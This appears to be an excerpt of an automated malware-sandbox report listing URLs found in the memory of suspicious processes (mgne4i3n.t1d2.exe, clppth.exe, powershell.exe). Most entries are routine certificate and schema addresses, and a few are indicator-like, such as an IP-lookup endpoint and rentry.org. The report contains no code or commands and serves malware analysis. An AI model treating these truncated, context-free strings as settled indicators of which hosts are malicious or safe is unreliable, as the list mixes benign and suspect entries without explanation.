                        Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491053063.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1493142728.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1477767217.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476660244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869C9000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486647943.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495572319.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1853576082.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000002.3773423449.00000156D219C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1855913817.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849130676.00000156D218C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: powershell.exe, 00000003.00000002.1682036119.000001D47070C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
                        Source: svchost.exe, 00000023.00000002.3293647693.000001B218E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                        Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491053063.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1493142728.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1477767217.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476660244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869C9000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486647943.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495572319.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1853576082.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000002.3773423449.00000156D219C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 
00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1855913817.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849130676.00000156D218C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491053063.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1493142728.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1477767217.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476660244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486647943.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495572319.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1853576082.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000002.3773423449.00000156D219C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 
00000026.00000003.1855913817.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849130676.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1973533379.00000156D218F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                        Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491053063.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1493142728.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1477767217.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476660244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486647943.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495572319.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1853576082.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1855913817.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 
00000026.00000003.1849130676.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1973533379.00000156D218F000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848837705.00000156D218C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: clppth.exe, 00000029.00000003.1941900772.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1949554408.000002C498AD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491053063.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1493142728.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1477767217.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476660244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486647943.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495572319.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1853576082.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000002.3773423449.00000156D219C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1855913817.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849130676.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1973533379.00000156D218F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                        Source: svchost.exe, 00000023.00000003.1651367816.000001B218D20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                        Source: powershell.exe, 00000003.00000002.1643088733.000001D468375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1366839863.0000018B60D6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1383368560.0000018B6F649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1383368560.0000018B6F506000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491053063.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1493142728.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1477767217.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476660244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486647943.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495572319.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1853576082.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000002.3773423449.00000156D219C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1855913817.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849130676.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1973533379.00000156D218F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491053063.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1493142728.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1477767217.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476660244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869C9000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486647943.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495572319.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1853576082.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000002.3773423449.00000156D219C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1855913817.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849130676.00000156D218C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491053063.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1493142728.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1477767217.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476660244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869C9000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486647943.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495572319.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1853576082.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000002.3773423449.00000156D219C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1855913817.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849130676.00000156D218C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491053063.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1493142728.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1477767217.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476660244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486647943.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495572319.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1853576082.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1855913817.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849130676.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1973533379.00000156D218F000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848837705.00000156D218C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                        Source: powershell.exe, 00000006.00000002.1366839863.0000018B60CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D459355000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rentry.org
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D458528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D458301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1366839863.0000018B5F491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B8DF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D458528000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 00000006.00000002.1366839863.0000018B60B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: powershell.exe, 00000006.00000002.1366839863.0000018B60CE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491053063.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1493142728.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1477767217.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476660244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486647943.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495572319.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1853576082.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000002.3773423449.00000156D219C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1855913817.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849130676.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1973533379.00000156D218F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000003.1635112128.0000019C71BA3000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3782652966.0000019C71BA7000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000003.1637123662.0000019C71BB1000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 0000002A.00000003.1984833829.00000276FE774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3805594021.00007FFB0B4C8000.00000008.00000001.01000000.0000001B.sdmp, clppth.exe, 00000026.00000003.1973533379.00000156D218F000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.2060011719.000002C498ACE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zlib.net/D
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D458301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1366839863.0000018B5F491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B8DD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B8DBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.000000000285A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.s
                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.000000000285A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D459440000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D459355000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1500962112.000001D4594B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B9821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B97FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
